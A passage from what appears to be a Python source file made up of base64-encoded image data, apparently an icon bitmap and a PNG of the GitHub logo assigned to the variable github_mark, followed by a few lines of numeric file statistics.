wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8AyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAxsTEAMjGxgCkoaEAe3d3AHd0cypMSknKFhIR/y0iIf9nUUz/eF1Y/2hOS/9XPjr/UTg0/1A3Nf9MNjT/STQx/0YxL/9CLi3/Pisr/zspKf83Jyj/MyQl/zAiJP8tHyH/Kh0g/ykdIP8pHSD/KB0g/ygdIP8oHSD/KB0g/ycdIP8nHSD/Jx0g/ycdH/8nHR//Jh0f/yYdH/8mHR//Jh0f/yYdH/8lHR//JR0f/yUdH/8lHR//JR0f/yUdH/8lHR//JB0f/yQdH/8kHR//JB0f/yUeIP8mHyH/JR0f/yQfIP8aGBf/DQ8L/0NFQuRKS0hHPD05AVJUUQB0dHIAzMzLAN3d3QDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbAP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDGxMQAyMbGAKShoQB5dXUAdXJxAIuJiCpqZ2fMIyAf/yMcGv9XREH/dFpX/2tST/9ZQD3/TjUz/0szMf9IMjH/RTEv/0IuLf8+Kyv/Oigp/zYmJ/8zJCX/MCEk/ywfIf8pHSD/KR0g/ykdIP8oHSD/KB0g/ygdIP8oHSD/Jx0g/ycdIP8nHSD/Jx0f/ycdH/8mHR//Jh0f/yYdH/8mHR//Jh0f/yYdH/8lHR//JR0f/yUdH/8lHR//JR0f/yUdH/8lHR//JB0f/yQdH/8mHyH/Jh8h/yYdIf8jHx7/FxcU/xUWEv9eYF3ncXJwR0lKRwI7PDgAUlRRAHR0cgDMzMsA3d3dANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMbExADIxsYApKGhAHl1dQByb24Ai4iIALi2tihubGuRHRoZ9xgUE/9BNDP/aVNQ/25WU/9cRUT/TTU0/0UwLv9DLi3/QS0t/z0rKv85KCn/NiYn/zMjJf8vISP/Kx8h/ykdIP8pHSD/KR0g/ygdIP8oHSD/KB0g/ygdIP8nHSD/Jx0g/ycdIP8nHSD/Jx0f/yYdH/8mHR//Jh0f/yYdH/8mHR//Jh0f/yUdH/8lHR//JR0f/yUdH/8lHR//JR0f/yQdH/8lHiD/JyAi/yYfIf8lHiD/IR0e/xESD/8SFA//XF1bs4+QjTJyc3ECR0hFADs8OABSVFEAdHRyAMzMywDd3d0A29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8AyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAxsTEAMjGxgCkoaEAeXV1AHJvbgCIhYUAwL6/AHBtbA1ua2t3R0VF8xQREP8qIiH/VERC/2lVVP9jTk3/UD08/0MvLv8+KSn/Oykp/zgnKP81JSb/MiMl/y8gI/8rHiH/KR0g/ykdIP8oHSD/KB0g/ygdIP8oHSD/KB0g/ycdIP8nHSD/Jx0g/ycdIP8nHR//Jh0f/yYdH/8mHR//Jh0f/yYdH/8mHR//Jh0f/yUdH/8lHR//JR0f/yUdH/8lHR//Jh8h/yggIv8nHyH/JB4f/xoaGP8KDAj/Ozs5/21ua4+Cg4EbjY6LAHBxbwBHSEUAOzw4AFJUUQB0dHIAzMzLAN3d3QDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbAP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDGxMQAyMbGAKShoQB5dXUAcm9uAIiFhQC/vb4AbWppAHNxcAl/fHwvYF1dvyonJ/8ZFRT/Ny0s/1hIR/9iUE7/V0ZF/0g1Nf87KSr/NiQl/zMjJf8xIiT/LiAi/yoeIf8pHSD/KR0g/ygdIP8oHSD/KB0g/ygdIP8oHSD/Jx0g/ycdIP8nHSD/Jx0g/ycdH/8nHR//Jh0f/yYdH/8mHR//Jh0f/yYdH/8mHR//JR0f/yUdH/8mHiD/KCAi/ykgI/8pHyL/Jh8g/x0bGv8UFhL/Gx4Z/0xOSuCJiYhRiYmIC4KDgQCMjYoAcHFvAEdIRQA7PDgAUlRRAHR0cgDMzMsA3d3dANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMbExADIxsYApKGhAHl1dQByb24AiIWFAL+9vgBtamkAcW9uAH98ewCPjIsQX1xcUzYzMt0cGRj/GxcV/zkwLv9SREL/WEdH/1E/QP9DMzT/Nycp/y8hIv8rHR//KBwf/ygcH/8pHSD/KB0g/ygdIP8oHSD/KB0g/ygdIP8nHSD/Jx0g/ycdIP8nHSD/Jx0g/ycdH/8mHR//Jh0f/yYdH/8mHR//Jh0f/yYdH/8nHyH/KSEj/ykhI/8pHyL/Jh8g/x8dG/8TFRH/FhkU/y8xLeRWV1RxbW9sHo2NjAOJiYgAgYKAAIyNigBwcW8AR0hFADs8OABSVFEAdHRyAMzMywDd3d0A29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8AyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAxsTEAMjGxgCkoaEAeXV1AHJvbgCIhYUAv72+AG1qaQBxb24Afnt6AJGOjQBdWlkDcm5uKnx6eZJHRkTzHBgX/xwXFv8yKyr/Rjo6/01AQP9KPD3/QTM1/zcqLP8uIib/Kh4h/ygdIP8nGx7/Jxwf/yccH/8nHB//Jxwf/yccH/8mHB//Jxwf/yYcH/8mHB//Jxwf/ycdH/8mHR//Jx4g/ygfIf8pICL/KiAj/yohI/8pHyP/JB4f/yAcG/8WFhL/EhMP/y4xLP93eHawY2RiM1NUUQZucG0AjIyLAImJiACBgoAAjI2KAHBxbwBHSEUAOzw4AFJUUQB0dHIAzMzLAN3d3QDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbAP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDGxMQAyMbGAKShoQB5dXUAcm9uAIiFhQC/vb4AbWppAHFvbgB+e3oAkY6NAFxZWAB2cnIAfnx7CI6NjC1+fHuVR0VD5CIgHv8XFRL/JSEf/zIrK/89MzP/PzQ2/z4yNv88MTT/OCww/zMpLP8xJin/LyQn/y0iJf8sIST/KyEk/yogI/8rICP/KiAk/yshJP8rIiX/LCIk/ywjJf8rIiT/KiEj/yogIv8mHiH/IRwc/xoZFv8VFhL/FxgU/zg5Nfpqamixfn58OZSWlApkZWIBUlNQAG5wbQCMjIsAiYmIAIGCgACMjYoAcHFvAEdIRQA7PDgAUlRRAHR0cgDMzMsA3d3dANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMbExADIxsYApKGhAHl1dQByb24AiIWFAL+9vgBtamkAcW9uAH57egCRjo0AXFlYAHZycgB9e3oAkpGQAIOBgAdraWgMYF5dW2FeXdEwLiz6JSIg/xwbGf8gHRv/KSUk/y0nJ/80Ky3/Ny4w/zguMP82LTD/Niwv/zUrLv80Ki3/Myks/zEoK/8wJyr/LyYp/ywjJ/8qIST/KB8h/yMdHP8fGxn/GhkW/xQVEf8aGhb/KSon/1BRTtZSU1B3ZGViHoiJhwl/gH4BlZeVAGNkYQBSU1AAbnBtAIyMiwCJiYgAgYKAAIyNigBwcW8AR0hFADs8OABSVFEAdHRyAMzMywDd3d0A29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8AyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAxsTEAMjGxgCkoaEAeXV1AHJvbgCIhYUAv72+AG1qaQBxb24Afnt6AJGOjQBcWVgAdnJyAH17egCSkZAAgoB/AG1ragBfXVwCkpCPCXVzcTJwb25xOTg2n0A+PechHx35JiQi/yEeHP8XFBL/GBYU/x8cG/8kIB//JSEg/yUgIP8lICD/JB8f/yIfHv8fHBr/GBgW/xMUEP8VFhL/IiIf/yEjHv4vMCz4UVJQ1F5eXI1ucG1CZmdlCFFSTwRmZ2QAiYqIAH5/fQCVl5UAY2RhAFJTUABucG0AjIyLAImJiACBgoAAjI2KAHBxbwBHSEUAOzw4AFJUUQB0dHIAzMzLAN3d3QDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbAP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDIxsYAyMbGAMjGxgDGxMQAyMbGAKShoQB5dXUAcm9uAIiFhQC/vb4AbWppAHFvbgB+e3oAkY6NAFxZWAB2cnIAfXt6AJKRkACCgH8AbWtqAF9dXACTkZAAd3V0AXNycQI5ODcDXFtaDE1LSjF8fHp2LCooeWJgX9VZWFbpOjo36CEgHegcGxjoHR0Z6B0dGegcHRnoGxwZ6CcoJehGRkPpYGBe509PTLlJSUZxhoeEY2BiXh9vcG0GXF1aAnFycAFmZ2UAUVJPAGZnZACJiogAfn99AJWXlQBjZGEAUlNQAG5wbQCMjIsAiYmIAIGCgACMjYoAcHFvAEdIRQA7PDgAUlRRAHR0cgDMzMsA3d3dANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////+AAAP////gAAD////////8AAAAH//+AAAAH///////8AAAAAD/gAAAAAf//////8AAAAAAAAAAAAAB//////+AAAAAAAAAAAAAAP//////AAAAAAAAAAAAAAB//////gAAAAAAAAAAAAAAP/////4AAAAAAAAAAAAAAD/////+AAAAAAAAAAAAAAA//////gAAAAAAAAAAAAAAP/////4AAAAAAAAAAAAAAD//////AAAAAAAAAAAAAAB//////gAAAAAAAAAAAAAAP/////4AAAAAAAAAAAAAAD/////+AAAAAAAAAAAAAAA//////gAAAAAAAAAAAAAAP/////4AAAAAAAAAAAAAAD/////+AAAAAAAAAAAAAAA//////wAAAAAAAAAAAAAAf/////8AAAAAAAAAAAAAAH//////AAAAAAAAAAAAAAB//////4AAAAAAAAAAAAAA///////AAAAAAAAAAAAAAf//////wAAAAAAAAAAAAAH///////AAAAAAAAAAAAAH///////4AAAAAAAAAAAAD////////wAAAAAAAAAAAD////////4AAAAAAAAAAAAf///////8AAAAAAAAAAAAH///////+AAAAAAAAAAAAA/////+P/AAAAAAAAAAAAAH/j///B/gAAAAAAAAAAAAB/g///gH4AAAAAAAAAAAAAPwH//4A8AAAAAAAAAAAAAD4B//+APAAAAAAAAAAAAAA+AP//gBwAAAAAAAAAAAAAHAB//4AIAAAAAAAAAAAAABgAf/+AAAAAAAAAAAAAAAAIAH//gAAAAAAAAAAAAAAAAAB//4AAAAAAAAAAAAAAAAAAf/+AAAAAAAAAAAAAAAAAAH//gAAAAAAAAAAAAAAAAAB//4AAAAAAAAAAAAAAAAAAf/+AAAAAAAAAAAAAAAAAAH//gAAAAAAAAAAAAAAAAAB//4AAAAAAAAAAAAAAAAAAf/+AAAAAAAAAAAAAAAAAAH//gAAAAAAAAAAAAAAAAAB//4AAAAAAAAAAAAAAAAAAf/+AAAAAAAAAAAAAAAAAAH//wAAAAAAAAAAAAAAAAAB//4AAAAAAAAAAAAAAAAAAf/+AAAAAAAAAAAAAAAAAAP//wAAAAAAAAAAAAAAAAAH//+AAAAAAAAAAAAAAAAAB///AAAAAAAAAAAAAAAAAAf//4AAAAAAAAAAAAAAAAAP//+AAAAAAAAAAAAAAAAAD///wAAAAAAAAAAAAAAAAA///8AAAAAAAAAAAAAAAAAf///wAAAAAAAAAAAAAAAAH///8AAAAAAAAAAAAAAAAD////AAAAAAAAAAAAAAAAA////4AAAAAAAAAAAAAAAAf////AAAAAAAAAAAAAAAAP////wAAAAAAAAAAAAAAAD/////AAAAAAAAAAAAAAAB/////wAAAAAAAAAAAAAAAf////+AAAAAAAAAAAAAAAP/////wAAAAAAAAAAAAAAH/////8AAAAAAAAAAAAAAD//////AAAAAAAAAAAAAAA//////gAAAAAAAAAAAAAAP/////4AAAAAAAAAAAAAAD/////+AAAAAAAAAAAAAAA//////gAAAAAAAAAAAAAAP/////8AAAAAAAAAAAAAAD//////AAAAAAAAAAAAAAA//////wAAAAAAAAAAAAAAP/////+AAAAAAAAAAAAAAD//////gAAAAAAAAAAAAAA//////4AAAAAAAAAAAAAAf/////+AAAAAAAAAAAAAAH//////wAAAAAAAAAAAAAB//////+AAAAAAAAAAAAAA///////wAAAAAAAAAAAAAf//////+AAAAAAAAAAAAAH///////AAAAAAAAAAAAAB///////wAAAAAAAAAAAAAf//////8AAAAAAAAAAAAAH///////AAAAAAAAAAAAAB///////wAAAAAAAAAAAAA///////+AAAAAAAAAAAAAH///////gAAAAAAAAAAAAB///////4AAAAAAAAAAAAA///////+AAAAAAAAAAAAAP///////gAAAAAAAAAAAAD///////8AAAAAAAAAAAAB////////AAAAAAAAAAAAAf///////wAAAAAAAAAAAAH///////+AAAAAAAAAAAAB////////gAAAAAAAAAAAA////////4AAAAAAAAAAAAP////////AAAAAAAAAAAAH////////wAAAAAAAAAAAB////////+AAAAAAAAAAAA/////////gAAAAAAAAAAAP////////8AAAAAAAAAAAH/////////AAAAAAAAAAAD/////////4AAAAAAAAAAA//////////AAAAAAAAAAAf/////////wAAAAAAAAAAP/////////+AAAAAAAAAAD//////////wAAAAAAAAAB//////////+AAAAAAAAAB///////////wAAAAAAAAA///////////+AAAAAAAAAP///////////wAAAAAAAAH///////////+AAAAAAAAD////////////wAAAAAAAD////////////+AAAAAAAB/////////////4AAAAAAA//////////////AAAAAAA//////////////8AAAAAAf//////////////wAAAAAf///////////////AAAAA////////////////8AAAA/////////////////////////////8='''''
github_mark = '''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'''''
| 48,016.5
| 90,210
| 0.756125
| 11,107
| 96,033
| 6.537499
| 0.534438
| 0.03498
| 0.049
| 0.060596
| 0.167865
| 0.159684
| 0.149631
| 0.135005
| 0.127927
| 0.114513
| 0
| 0.124183
